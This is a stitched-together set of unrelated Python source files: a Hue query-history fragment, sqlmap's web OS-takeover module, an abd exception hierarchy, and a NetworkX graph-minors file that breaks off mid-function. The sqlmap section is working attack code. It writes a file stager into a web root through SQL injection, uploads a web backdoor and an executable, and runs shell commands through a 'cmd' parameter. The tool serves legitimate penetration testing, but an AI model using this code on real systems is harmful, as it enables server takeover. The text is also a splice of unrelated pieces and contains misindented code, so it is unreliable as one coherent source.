    LOG.error("Invalid query context data: %s" % (context,))
    return None
HADOOP_JOBS_RE = re.compile("Starting Job = ([a-z0-9_]+?),")
def _parse_out_hadoop_jobs(log):
"""
Ideally, Hive would tell us what jobs it has run directly from the Thrift interface.
"""
ret = []
for match in HADOOP_JOBS_RE.finditer(log):
job_id = match.group(1)
if job_id not in ret:
ret.append(job_id)
return ret
def _copy_prefix(prefix, base_dict):
    """Return a mutable QueryDict holding the entries of ``base_dict`` whose
    keys start with ``prefix``."""
    filtered = QueryDict(None, mutable=True)
    for key, val in base_dict.iteritems():
        if not key.startswith(prefix):
            continue
        filtered[key] = val
    return filtered
def _list_query_history(user, querydict, page_size, prefix=""):
    """
    _list_query_history(user, querydict, page_size, prefix) -> (page, filter_param)

    A helper to gather the history page. It understands all the GET params in
    ``list_query_history``, by reading keys from the ``querydict`` with the
    given ``prefix``.
    """
    DEFAULT_SORT = ('-', 'date')  # Descending date

    SORT_ATTR_TRANSLATION = dict(
        date='submission_date',
        state='last_state',
        name='design__name',
        type='design__type',
    )

    db_queryset = models.QueryHistory.objects.select_related()

    # Filtering
    #
    # Queries without designs are the ones we submitted on behalf of the user,
    # (e.g. view table data). Exclude those when returning query history.
    if querydict.get(prefix + 'auto_query', 'on') != 'on':
        db_queryset = db_queryset.exclude(design__isnull=False, design__is_auto=True)

    user_filter = querydict.get(prefix + 'user', user.username)
    if user_filter != ':all':
        db_queryset = db_queryset.filter(owner__username=user_filter)

    # Design id
    design_id = querydict.get(prefix + 'design_id')
    if design_id:
        db_queryset = db_queryset.filter(design__id=int(design_id))

    # Search
    search_filter = querydict.get(prefix + 'search')
    if search_filter:
        db_queryset = db_queryset.filter(Q(design__name__icontains=search_filter) | Q(query__icontains=search_filter) | Q(owner__username__icontains=search_filter))

    # Design type (membership tested directly on the dict, not on .keys())
    d_type = querydict.get(prefix + 'type')
    if d_type:
        if d_type not in SavedQuery.TYPES_MAPPING:
            LOG.warn('Bad parameter to list_query_history: type=%s' % (d_type,))
        else:
            db_queryset = db_queryset.filter(design__type=SavedQuery.TYPES_MAPPING[d_type])

    # Ordering
    sort_key = querydict.get(prefix + 'sort')
    if sort_key:
        sort_dir, sort_attr = '', sort_key
        if sort_key[0] == '-':
            sort_dir, sort_attr = '-', sort_key[1:]

        # `dict.has_key` was removed in Python 3; `in` works everywhere.
        if sort_attr not in SORT_ATTR_TRANSLATION:
            LOG.warn('Bad parameter to list_query_history: sort=%s' % (sort_key,))
            sort_dir, sort_attr = DEFAULT_SORT
    else:
        sort_dir, sort_attr = DEFAULT_SORT

    db_queryset = db_queryset.order_by(sort_dir + SORT_ATTR_TRANSLATION[sort_attr], '-id')

    # Get the total return count before slicing
    total_count = db_queryset.count()

    # Slicing (must be the last filter applied)
    pagenum = int(querydict.get(prefix + 'page', 1))
    if pagenum < 1:
        pagenum = 1
    db_queryset = db_queryset[page_size * (pagenum - 1):page_size * pagenum]

    paginator = Paginator(db_queryset, page_size, total=total_count)
    page = paginator.page(pagenum)

    # We do slicing ourselves, rather than letting the Paginator handle it, in order to
    # update the last_state on the running queries
    for history in page.object_list:
        _update_query_state(history.get_full_object())

    # We need to pass the parameters back to the template to generate links
    keys_to_copy = [prefix + key for key in ('user', 'type', 'sort', 'design_id', 'auto_query', 'search')]
    filter_params = copy_query_dict(querydict, keys_to_copy)

    return page, filter_params
def _update_query_state(query_history):
    """
    Update the last_state for a QueryHistory object. Returns success as True/False.

    This only occurs iff the current last_state is submitted or running, since the other
    states are stable, more-or-less.

    Note that there is a transition from available/failed to expired. That occurs lazily
    when the user attempts to view results that have expired.
    """
    # States are ordered; anything at or before `running` is still in flight
    # and worth polling the server about.
    if query_history.last_state <= models.QueryHistory.STATE.running.index:
        try:
            state_enum = dbms.get(query_history.owner, query_history.get_query_server_config()).get_state(query_history.get_handle())
            if state_enum is None:
                # Error was logged at the source
                return False
        except Exception, e:
            LOG.error(e)
            # Any communication/server error marks the query as failed.
            state_enum = models.QueryHistory.STATE.failed
        query_history.save_state(state_enum)
    return True
def get_db_choices(request):
    """Return (value, label) pairs for the databases visible to the user,
    suitable for a Django choice field."""
    query_server = get_query_server_config(get_app_name(request))
    databases = dbms.get(request.user, query_server).get_databases()
    return [(name, name) for name in databases]
# Matches any run of whitespace, including newlines. Raw string avoids the
# invalid-escape-sequence warning for "\s" on modern Pythons.
WHITESPACE = re.compile(r"\s+", re.MULTILINE)


def collapse_whitespace(s):
    """Collapse each whitespace run in ``s`` to one space and strip the ends."""
    return WHITESPACE.sub(" ", s).strip()
| |
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import os
import posixpath
import re
import StringIO
import tempfile
import urlparse
from extra.cloak.cloak import decloak
from lib.core.agent import agent
from lib.core.common import arrayizeValue
from lib.core.common import Backend
from lib.core.common import extractRegexResult
from lib.core.common import getAutoDirectories
from lib.core.common import getManualDirectories
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSQLSnippet
from lib.core.common import getUnicode
from lib.core.common import ntToPosixSlashes
from lib.core.common import isTechniqueAvailable
from lib.core.common import isWindowsDriveLetterPath
from lib.core.common import normalizePath
from lib.core.common import posixToNtSlashes
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import singleTimeWarnMessage
from lib.core.convert import hexencode
from lib.core.convert import utf8encode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.enums import DBMS
from lib.core.enums import OS
from lib.core.enums import PAYLOAD
from lib.core.enums import WEB_API
from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT
from lib.core.settings import EVENTVALIDATION_REGEX
from lib.core.settings import VIEWSTATE_REGEX
from lib.request.connect import Connect as Request
from thirdparty.oset.pyoset import oset
class Web:
    """
    This class defines web-oriented OS takeover functionalities for
    plugins.
    """

    def __init__(self):
        # All of these are populated lazily by webInit().
        self.webApi = None
        self.webBaseUrl = None
        self.webBackdoorUrl = None
        self.webBackdoorFilePath = None
        self.webStagerUrl = None
        self.webStagerFilePath = None
        self.webDirectory = None

    def webBackdoorRunCmd(self, cmd):
        """Run ``cmd`` through the uploaded web backdoor.

        Returns the command output captured between <pre> tags on the
        response page, or None when no backdoor is set up / nothing matched.
        """
        if self.webBackdoorUrl is None:
            return

        output = None

        if not cmd:
            # Fall back to the command supplied on the sqlmap command line.
            cmd = conf.osCmd

        cmdUrl = "%s?cmd=%s" % (self.webBackdoorUrl, cmd)
        page, _, _ = Request.getPage(url=cmdUrl, direct=True, silent=True, timeout=BACKDOOR_RUN_CMD_TIMEOUT)

        if page is not None:
            output = re.search("<pre>(.+?)</pre>", page, re.I | re.S)

            if output:
                output = output.group(1)

        return output

    def webUpload(self, destFileName, directory, stream=None, content=None, filepath=None):
        """Upload a file through the web stager.

        The payload may come from a ``stream``, a ``content`` string, or a
        ``filepath`` on disk (a trailing '_' marks a cloaked file).
        """
        if filepath is not None:
            if filepath.endswith('_'):
                content = decloak(filepath)  # cloaked file
            else:
                with open(filepath, "rb") as f:
                    content = f.read()

        if content is not None:
            stream = StringIO.StringIO(content)  # string content

        return self._webFileStreamUpload(stream, destFileName, directory)

    def _webFileStreamUpload(self, stream, destFileName, directory):
        """POST ``stream`` to the stager as a multipart upload; return success."""
        stream.seek(0)  # Rewind

        try:
            # Some stream objects reject attribute assignment (e.g. cStringIO).
            setattr(stream, "name", destFileName)
        except TypeError:
            pass

        if self.webApi in getPublicTypeMembers(WEB_API, True):
            multipartParams = {
                "upload": "1",
                "file": stream,
                "uploadDir": directory,
            }

            if self.webApi == WEB_API.ASPX:
                # ASP.NET forms require the server-issued validation tokens.
                multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION
                multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE

            page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)

            if "File uploaded" not in page:
                warnMsg = "unable to upload the file through the web file "
                warnMsg += "stager to '%s'" % directory
                logger.warn(warnMsg)
                return False
            else:
                return True
        else:
            logger.error("sqlmap hasn't got a web backdoor nor a web file stager for %s" % self.webApi)
            return False

    def _webFileInject(self, fileContent, fileName, directory):
        """Write ``fileContent`` to ``directory`` on the server via SQL
        injection (MySQL 'write_file_limit' snippet, hex-encoded payload)."""
        outFile = posixpath.join(ntToPosixSlashes(directory), fileName)
        uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
        query = ""

        if isTechniqueAvailable(kb.technique):
            where = kb.injection.data[kb.technique].where

            if where == PAYLOAD.WHERE.NEGATIVE:
                # Make the original WHERE clause true so the injection runs.
                randInt = randomInt()
                query += "OR %d=%d " % (randInt, randInt)

        query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery))
        query = agent.prefixQuery(query)
        query = agent.suffixQuery(query)
        payload = agent.payload(newValue=query)
        page = Request.queryPage(payload)

        return page

    def webInit(self):
        """
        This method is used to write a web backdoor (agent) on a writable
        remote directory within the web server document root.
        """
        # Already initialized on a previous call.
        if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webApi is not None:
            return

        self.checkDbmsOs()

        # Guess the server-side language from the target URL's extension.
        default = None
        choices = list(getPublicTypeMembers(WEB_API, True))

        for ext in choices:
            if conf.url.endswith(ext):
                default = ext
                break

        if not default:
            default = WEB_API.ASP if Backend.isOs(OS.WINDOWS) else WEB_API.PHP

        # Prompt the user to pick (or confirm) the web application language.
        message = "which web application language does the web server "
        message += "support?\n"

        for count in xrange(len(choices)):
            ext = choices[count]
            message += "[%d] %s%s\n" % (count + 1, ext.upper(), (" (default)" if default == ext else ""))

            if default == ext:
                default = count + 1

        message = message[:-1]

        while True:
            choice = readInput(message, default=str(default))

            if not choice.isdigit():
                logger.warn("invalid value, only digits are allowed")
            elif int(choice) < 1 or int(choice) > len(choices):
                logger.warn("invalid value, it must be between 1 and %d" % len(choices))
            else:
                self.webApi = choices[int(choice) - 1]
                break

        # Candidate writable directories: user-provided first, then guessed.
        directories = list(arrayizeValue(getManualDirectories()))
        directories.extend(getAutoDirectories())
        directories = list(oset(directories))

        backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
        backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))

        stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))

        for directory in directories:
            if not directory:
                continue

            stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
            self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)

            uploaded = False
            directory = ntToPosixSlashes(normalizePath(directory))

            # Normalize to an absolute POSIX-style path ending with '/'.
            if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'):
                directory = "/%s" % directory
            else:
                directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory

            if not directory.endswith('/'):
                directory += '/'

            # Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method
            infoMsg = "trying to upload the file stager on '%s' " % directory
            infoMsg += "via LIMIT 'LINES TERMINATED BY' method"
            logger.info(infoMsg)
            self._webFileInject(stagerContent, stagerName, directory)

            # Probe every suffix of the directory path as a candidate URL root.
            for match in re.finditer('/', directory):
                self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
                self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
                debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
                logger.debug(debugMsg)

                uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
                uplPage = uplPage or ""

                if "sqlmap file uploader" in uplPage:
                    uploaded = True
                    break

            # Fall-back to UNION queries file upload method
            if not uploaded:
                warnMsg = "unable to upload the file stager "
                warnMsg += "on '%s'" % directory
                singleTimeWarnMessage(warnMsg)

                if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
                    infoMsg = "trying to upload the file stager on '%s' " % directory
                    infoMsg += "via UNION method"
                    logger.info(infoMsg)

                    stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
                    self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)

                    # Materialize the stager locally so unionWriteFile can send it.
                    handle, filename = tempfile.mkstemp()
                    os.close(handle)

                    with open(filename, "w+b") as f:
                        _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
                        _ = _.replace("WRITABLE_DIR", utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory))
                        f.write(_)

                    self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)

                    for match in re.finditer('/', directory):
                        self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
                        self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
                        debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
                        logger.debug(debugMsg)

                        uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
                        uplPage = uplPage or ""

                        if "sqlmap file uploader" in uplPage:
                            uploaded = True
                            break

            if not uploaded:
                continue

            if "<%" in uplPage or "<?" in uplPage:
                # Raw template markers in the response: file served but not executed.
                warnMsg = "file stager uploaded on '%s', " % directory
                warnMsg += "but not dynamically interpreted"
                logger.warn(warnMsg)
                continue
            elif self.webApi == WEB_API.ASPX:
                # Remember ASP.NET tokens needed for subsequent stager POSTs.
                kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage)
                kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage)

            infoMsg = "the file stager has been successfully uploaded "
            infoMsg += "on '%s' - %s" % (directory, self.webStagerUrl)
            logger.info(infoMsg)

            if self.webApi == WEB_API.ASP:
                # ASP stager reports a separate scripts directory for the backdoor.
                match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)

                if match:
                    backdoorDirectory = match.group(1)
                else:
                    continue

                _ = "tmpe%s.exe" % randomStr(lowercase=True)
                if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)):
                    self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'))
                    self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName)
                    self.webDirectory = backdoorDirectory
                else:
                    continue
            else:
                if not self.webUpload(backdoorName, posixToNtSlashes(directory) if Backend.isOs(OS.WINDOWS) else directory, content=backdoorContent):
                    warnMsg = "backdoor has not been successfully uploaded "
                    warnMsg += "through the file stager possibly because "
                    warnMsg += "the user running the web server process "
                    warnMsg += "has not write privileges over the folder "
                    warnMsg += "where the user running the DBMS process "
                    warnMsg += "was able to upload the file stager or "
                    warnMsg += "because the DBMS and web server sit on "
                    warnMsg += "different servers"
                    logger.warn(warnMsg)

                    message = "do you want to try the same method used "
                    message += "for the file stager? [Y/n] "
                    getOutput = readInput(message, default="Y")

                    if getOutput in ("y", "Y"):
                        self._webFileInject(backdoorContent, backdoorName, directory)
                    else:
                        continue

                self.webBackdoorUrl = posixpath.join(ntToPosixSlashes(self.webBaseUrl), backdoorName)
                self.webDirectory = directory

            self.webBackdoorFilePath = posixpath.join(ntToPosixSlashes(directory), backdoorName)

            testStr = "command execution test"
            output = self.webBackdoorRunCmd("echo %s" % testStr)

            if output == "0":
                warnMsg = "the backdoor has been uploaded but required privileges "
                warnMsg += "for running the system commands are missing"
                raise SqlmapNoneDataException(warnMsg)
            elif output and testStr in output:
                infoMsg = "the backdoor has been successfully "
            else:
                infoMsg = "the backdoor has probably been successfully "

            infoMsg += "uploaded on '%s' - " % self.webDirectory
            infoMsg += self.webBackdoorUrl
            logger.info(infoMsg)

            break
| |
"""Exception hierarchy for abd user and system errors."""
# =============================================================================
# CONTENTS
# -----------------------------------------------------------------------------
# abdt_exception
#
# Public Classes:
# AbdBaseException
# AbdUserException
# AbdSystemException
# MissingBaseException
# NoUsersOnBranchException
# LargeDiffException
# CommitMessageParseException
# LandingException
# LandingPushBaseException
# ReviewAbandonedException
# NoHistoryException
# NoDiffException
#
# -----------------------------------------------------------------------------
# (this contents block is generated, edits will be lost)
# =============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
class AbdBaseException(Exception):

    def __init__(self, message):
        """Root of the abd exception hierarchy.

        :message: the message to report

        """
        decorated = "abdt_exception__BaseException:\n%s\n" % (message,)
        super(AbdBaseException, self).__init__(decorated)
class AbdUserException(AbdBaseException):

    def __init__(self, message):
        """Base for exceptions triggered by user action.

        :message: the message to report

        """
        decorated = "abdt_exception__UserException:\n%s\n" % (message,)
        super(AbdUserException, self).__init__(decorated)
class AbdSystemException(AbdBaseException):
    def __init__(self, message):
        """Base for abd system-triggered exceptions to inherit from.

        :message: the message to report

        """
        # Fixed copy-paste bug: the label previously read
        # "abdt_exception__UserException", mislabelling system errors.
        message = (
            "abdt_exception__SystemException:\n" +
            str(message) + "\n")
        super(AbdSystemException, self).__init__(message)
# TODO: add BadBranchNameException
# TODO: add UnrelatedBaseException
# TODO: add EmptyDiffException
# TODO: add NotPhabricatorUserException
class MissingBaseException(AbdUserException):

    def __init__(self, review_branch_name, description, base_name):
        """Raised when the branch a review is based on does not exist.

        :review_branch_name: name of the branch being reviewed
        :description: description part of the branch
        :base_name: name of the missing base branch

        """
        detail = (
            "abdt_exception__MissingBaseException:\n"
            "review_branch_name: '%s'\n"
            "description: '%s'\n"
            "base_name: '%s'\n" % (review_branch_name, description, base_name))
        super(MissingBaseException, self).__init__(detail)
        self.review_branch_name = review_branch_name
        self.description = description
        self.base_name = base_name
class NoUsersOnBranchException(AbdUserException):

    def __init__(self, review_branch_name, base_name, emails):
        """Raised when a branch contains commits by no known users.

        :review_branch_name: name of the branch being reviewed
        :base_name: name of the missing base branch
        :emails: email addresses of authors on the branch

        """
        detail = (
            "abdt_exception__NoUsersOnBranchException:\n"
            "review_branch_name: '%s'\n"
            "base_name: '%s'\n"
            "emails: '%s'\n" % (review_branch_name, base_name, emails))
        super(NoUsersOnBranchException, self).__init__(detail)
        self.review_branch_name = review_branch_name
        self.base_name = base_name
        self.emails = emails
class LargeDiffException(AbdUserException):

    def __init__(self, diff_summary, diff_len, diff_len_limit):
        """Raised when a diff cannot be made small enough.

        :diff_summary: a textual summary of the diff, e.g. diff --stat
        :diff_len: the size of the diff
        :diff_len_limit: the size limit for diffs

        """
        detail = (
            "abdt_exception__LargeDiffException:\n"
            "diff_summary: '%s'\n"
            "diff_len: '%s'\n"
            "diff_len_limit: '%s'\n" % (diff_summary, diff_len, diff_len_limit))
        super(LargeDiffException, self).__init__(detail)
        self.diff_summary = diff_summary
        self.diff_len = diff_len
        self.diff_len_limit = diff_len_limit
class CommitMessageParseException(AbdUserException):

    def __init__(self, errors, fields, digest):
        """Raised when commit messages cannot be parsed into review fields.

        :errors: errors reported by Phabricator
        :fields: the resulting fields response (if any)
        :digest: a digest of the commit messages

        """
        detail = (
            "abdt_exception__CommitMessageParseException:\n"
            "errors: '%s'\n"
            "fields: '%s'\n"
            "digest: '%s'\n" % (errors, fields, digest))
        super(CommitMessageParseException, self).__init__(detail)
        self.errors = errors
        self.fields = fields
        self.digest = digest
class LandingException(AbdUserException):

    def __init__(self, message, review_branch_name, base_name):
        """Raised when landing a review fails.

        :message: any available error message
        :review_branch_name: name of the branch being reviewed
        :base_name: name of the base branch

        """
        detail = (
            "abdt_exception__LandingException:\n"
            "message: '%s'\n"
            "review_branch_name: '%s'\n"
            "base_name: '%s'\n" % (message, review_branch_name, base_name))
        super(LandingException, self).__init__(detail)
        self.review_branch_name = review_branch_name
        self.base_name = base_name
class LandingPushBaseException(AbdUserException):

    def __init__(self, message, review_branch_name, base_name):
        """Raised when landing fails at the push-new-base stage.

        :message: any available error message
        :review_branch_name: name of the branch being reviewed
        :base_name: name of the base branch

        """
        detail = (
            "abdt_exception__LandingPushBaseException:\n"
            "message: '%s'\n"
            "review_branch_name: '%s'\n"
            "base_name: '%s'\n" % (message, review_branch_name, base_name))
        super(LandingPushBaseException, self).__init__(detail)
        self.review_branch_name = review_branch_name
        self.base_name = base_name
class ReviewAbandonedException(AbdUserException):

    def __init__(self):
        """Raised when the author has abandoned the review."""
        super(ReviewAbandonedException, self).__init__(
            "abdt_exception__ReviewAbandonedException")
class NoHistoryException(AbdUserException):

    def __init__(self, review_branch_name, base_name):
        """Raised when a review branch has no commits beyond its base.

        :review_branch_name: the string name of the review branch
        :base_name: the string name of the branch the review lands on

        """
        super(NoHistoryException, self).__init__(
            "abdt_exception__NoHistoryException")
        self.review_branch_name = review_branch_name
        self.base_name = base_name
class NoDiffException(AbdUserException):

    def __init__(self, base_name, review_branch_name, review_branch_hash):
        """Raised when a review has no difference against its base.

        :base_name: the string name of the branch the review lands on
        :review_branch_name: the string name of the review branch
        :review_branch_hash: the string commit hash of the review branch

        """
        super(NoDiffException, self).__init__(
            "abdt_exception__NoDiffException")
        self.base_name = base_name
        self.review_branch_name = review_branch_name
        self.review_branch_hash = review_branch_hash
# -----------------------------------------------------------------------------
# Copyright (C) 2013-2014 Bloomberg Finance L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------ END-OF-FILE ----------------------------------
| |
# minors.py - functions for computing minors of graphs
#
# Copyright 2015 Jeffrey Finkelstein <jeffrey.finkelstein@gmail.com>.
# Copyright 2010 Drew Conway <drew.conway@nyu.edu>
# Copyright 2010 Aric Hagberg <hagberg@lanl.gov>
#
# This file is part of NetworkX.
#
# NetworkX is distributed under a BSD license; see LICENSE.txt for more
# information.
"""Provides functions for computing minors of a graph."""
from itertools import chain
from itertools import combinations
from itertools import permutations
from itertools import product
import networkx as nx
from networkx import density
from networkx.exception import NetworkXException
from networkx.utils import arbitrary_element
__all__ = ['contracted_edge', 'contracted_nodes',
'identified_nodes', 'quotient_graph', 'blockmodel']
# Shorthand: flatten an iterable of iterables by one level.
chaini = chain.from_iterable
def equivalence_classes(iterable, relation):
    """Returns the set of equivalence classes of the given ``iterable`` under
    the specified equivalence relation.

    ``relation`` must be a Boolean-valued function that takes two arguments.
    It must represent an equivalence relation (that is, the relation induced
    by the function must be reflexive, symmetric, and transitive).

    The return value is a set of sets. It is a partition of the elements of
    ``iterable``; duplicate elements will be ignored so it makes the most
    sense for ``iterable`` to be a :class:`set`.

    """
    # Build mutable classes first; freeze them only on return.
    classes = []
    for element in iterable:
        # An element joins the first class whose representative it relates
        # to; by transitivity/symmetry there is at most one such class, so
        # testing against a single representative (the first member) suffices.
        home = next((cls for cls in classes if relation(cls[0], element)), None)
        if home is None:
            # Unmatched elements found a new singleton class.
            classes.append([element])
        else:
            home.append(element)
    return {frozenset(cls) for cls in classes}
def quotient_graph(G, partition, edge_relation=None, node_data=None,
                   edge_data=None, relabel=False, create_using=None):
    """Returns the quotient graph of ``G`` under the specified equivalence
    relation on nodes.
    Parameters
    ----------
    G : NetworkX graph
       The graph for which to return the quotient graph with the
       specified node relation.
    partition : function or list of sets
       If a function, this function must represent an equivalence
       relation on the nodes of ``G``. It must take two arguments *u*
       and *v* and return ``True`` exactly when *u* and *v* are in the
       same equivalence class. The equivalence classes form the nodes
       in the returned graph.
       If a list of sets, the list must form a valid partition of
       the nodes of the graph. That is, each node must be in exactly
       one block of the partition.
    edge_relation : Boolean function with two arguments
       This function must represent an edge relation on the *blocks* of
       ``G`` in the partition induced by ``node_relation``. It must
       take two arguments, *B* and *C*, each one a set of nodes, and
       return ``True`` exactly when there should be an edge joining
       block *B* to block *C* in the returned graph.
       If ``edge_relation`` is not specified, it is assumed to be the
       following relation. Block *B* is related to block *C* if and
       only if some node in *B* is adjacent to some node in *C*,
       according to the edge set of ``G``.
    edge_data : function
       This function takes two arguments, *B* and *C*, each one a set
       of nodes, and must return a dictionary representing the edge
       data attributes to set on the edge joining *B* and *C*, should
       there be an edge joining *B* and *C* in the quotient graph (if
       no such edge occurs in the quotient graph as determined by
       ``edge_relation``, then the output of this function is ignored).
       If the quotient graph would be a multigraph, this function is
       not applied, since the edge data from each edge in the graph
       ``G`` appears in the edges of the quotient graph.
    node_data : function
       This function takes one argument, *B*, a set of nodes in ``G``,
       and must return a dictionary representing the node data
       attributes to set on the node representing *B* in the quotient graph.
       If ``None``, the following node attributes will be set:
       * ``'graph'``, the subgraph of the graph ``G`` that this block
         represents,
       * ``'nnodes'``, the number of nodes in this block,
       * ``'nedges'``, the number of edges within this block,
       * ``'density'``, the density of the subgraph of ``G`` that this
         block represents.
    relabel : bool
       If ``True``, relabel the nodes of the quotient graph to be
       nonnegative integers. Otherwise, the nodes are identified with
       :class:`frozenset` instances representing the blocks given in
       ``partition``.
    create_using : NetworkX graph
       If specified, this must be an instance of a NetworkX graph
       class. The nodes and edges of the quotient graph will be added
       to this graph and returned. If not specified, the returned graph
       will have the same type as the input graph.
    Returns
    -------
    NetworkX graph
       The quotient graph of ``G`` under the equivalence relation
       specified by ``partition``. If the partition were given as a
       list of :class:`set` instances and ``relabel`` is ``False``,
       each node will be a :class:`frozenset` corresponding to the same
       :class:`set`.
    Raises
    ------
    NetworkXException
       If the given partition is not a valid partition of the nodes of
       ``G``.
    Examples
    --------
    The quotient graph of the complete bipartite graph under the "same
    neighbors" equivalence relation is `K_2`. Under this relation, two nodes
    are equivalent if they are not adjacent but have the same neighbor set::
        >>> import networkx as nx
        >>> G = nx.complete_bipartite_graph(2, 3)
        >>> same_neighbors = lambda u, v: (u not in G[v] and v not in G[u]
        ...                                and G[u] == G[v])
        >>> Q = nx.quotient_graph(G, same_neighbors)
        >>> K2 = nx.complete_graph(2)
        >>> nx.is_isomorphic(Q, K2)
        True
    The quotient graph of a directed graph under the "same strongly connected
    component" equivalence relation is the condensation of the graph (see
    :func:`condensation`). This example comes from the Wikipedia article
    *`Strongly connected component`_*::
        >>> import networkx as nx
        >>> G = nx.DiGraph()
        >>> edges = ['ab', 'be', 'bf', 'bc', 'cg', 'cd', 'dc', 'dh', 'ea',
        ...          'ef', 'fg', 'gf', 'hd', 'hf']
        >>> G.add_edges_from(tuple(x) for x in edges)
        >>> components = list(nx.strongly_connected_components(G))
        >>> sorted(sorted(component) for component in components)
        [['a', 'b', 'e'], ['c', 'd', 'h'], ['f', 'g']]
        >>>
        >>> C = nx.condensation(G, components)
        >>> component_of = C.graph['mapping']
        >>> same_component = lambda u, v: component_of[u] == component_of[v]
        >>> Q = nx.quotient_graph(G, same_component)
        >>> nx.is_isomorphic(C, Q)
        True
    Node identification can be represented as the quotient of a graph under the
    equivalence relation that places the two nodes in one block and each other
    node in its own singleton block::
        >>> import networkx as nx
        >>> K24 = nx.complete_bipartite_graph(2, 4)
        >>> K34 = nx.complete_bipartite_graph(3, 4)
        >>> C = nx.contracted_nodes(K34, 1, 2)
        >>> nodes = {1, 2}
        >>> is_contracted = lambda u, v: u in nodes and v in nodes
        >>> Q = nx.quotient_graph(K34, is_contracted)
        >>> nx.is_isomorphic(Q, C)
        True
        >>> nx.is_isomorphic(Q, K24)
        True
    The blockmodeling technique described in [1]_ can be implemented as a
    quotient graph::
        >>> G = nx.path_graph(6)
        >>> partition = [{0, 1}, {2, 3}, {4, 5}]
        >>> M = nx.quotient_graph(G, partition, relabel=True)
        >>> list(M.edges())
        [(0, 1), (1, 2)]
    .. _Strongly connected component: https://en.wikipedia.org/wiki/Strongly_connected_component
    References
    ----------
    .. [1] Patrick Doreian, Vladimir Batagelj, and Anuska Ferligoj.
           *Generalized Blockmodeling*.
           Cambridge University Press, 2004.
    """
    # If the user provided an equivalence relation as a function compute
    # the blocks of the partition on the nodes of G induced by the
    # equivalence relation.
    if callable(partition):
        partition = equivalence_classes(G, partition)
    # Each node in the graph must be in exactly one block.
    if any(sum(1 for b in partition if v in b) != 1 for v in G):
        raise NetworkXException('each node must be in exactly one block')
    # NOTE(review): create_using is only used as a *type template* -- a fresh
    # empty instance of its class is created, so any nodes/edges already
    # present in the supplied graph are ignored, despite what the docstring
    # above suggests.  Confirm intended semantics before changing either.
    H = type(create_using)() if create_using is not None else type(G)()
    # By default set some basic information about the subgraph that each block
    # represents on the nodes in the quotient graph.
    if node_data is None:
        def node_data(b):
            S = G.subgraph(b)
            return dict(graph=S, nnodes=len(S), nedges=S.number_of_edges(),
                        density=density(S))
    # Each block of the partition becomes a node in the quotient graph.
    partition = [frozenset(b) for b in partition]
    H.add_nodes_from((b, node_data(b)) for b in partition)
    # By default, the edge relation is the relation defined as follows. B is
    # adjacent to C if a node in B is adjacent to a node in C, according to the
    # edge set of G.
    #
    # This is not a particularly efficient implementation of this relation:
    # there are O(n^2) pairs to check and each check may require O(log n) time
    # (to check set membership). This can certainly be parallelized.
    if edge_relation is None:
        def edge_relation(b, c):
            return any(v in G[u] for u, v in product(b, c))
    # By default, sum the weights of the edges joining pairs of nodes across
    # blocks to get the weight of the edge joining those two blocks.
    if edge_data is None:
        def edge_data(b, c):
            edgedata = (d for u, v, d in G.edges(b | c, data=True)
